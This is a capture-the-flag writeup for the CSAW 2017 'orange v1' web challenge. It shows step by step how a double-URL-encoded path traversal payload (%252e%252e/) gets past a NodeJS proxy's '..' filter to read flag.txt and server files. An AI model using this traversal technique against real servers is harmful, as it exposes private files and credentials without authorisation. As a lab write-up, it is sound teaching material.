CTFtime.org / CSAW CTF Qualification Round 2017 / orange v1 / Writeup

# ▼▼▼Orange v1(Web:100)▼▼▼ (421/1444 team=29.2%)
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
I wrote a little proxy program in NodeJS for my poems folder.
Everyone wants to read flag.txt but I like it too much to share.
http://web.chal.csaw.io:7311/?path=orange.txt
```

### 【function】
GET /?path=orange.txt

↓

`i love oranges`

### 【goal】
find **flag.txt**

### 【Search for vulnerabilities】

GET /?path=

↓

```
<html>
<title>Directory listing for /poems/</title>
<body>
<h2>Directory listing for /poems/</h2>
<hr>

<hr>
</body>
</html>
```

↓

**Directory listing vulnerability★**

-----

GET /?path=../

GET /?path=..

↓

`WHOA THATS BANNED!!!!`

↓

**..(dot) is detected!!★**

-----

**Double encode**(https://www.owasp.org/index.php/Double_Encoding)

↓

GET /?path=**%252e%252e**/

↓

```
<html>
<title>Directory listing for /poems/../</title>
<body>
<h2>Directory listing for /poems/../</h2>
<hr>

<hr>
</body>
</html>
```

↓

Success!!★

-----

GET /?path=%252e%252e/flag.txt

↓

**flag{thank_you_based_orange_for_this_ctf_challenge}**

-----

### -----Reference: Other source code)-----
GET /?path=%252e%252e/server.js

↓

```
var http = require('http');
var fs = require('fs');
var url = require('url');

-----

GET /?path=%252e%252e/back.py

↓

```
#!/usr/bin/python

import SimpleHTTPServer
import SocketServer

PORT = 8080

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer(("", PORT), Handler)

print "Serving at port", PORT
httpd.serve_forever()
```

-----

GET /?path=%252e%252e/serve.sh

↓

```
#!/usr/bin/env bash

python back.py &
nodejs server.js
```

-----

GET /?path=.%252e/.dockerignore

↓

```
Dockerfile
docker-compose.yml
README.md
```

orange v1

Comments

Sign in with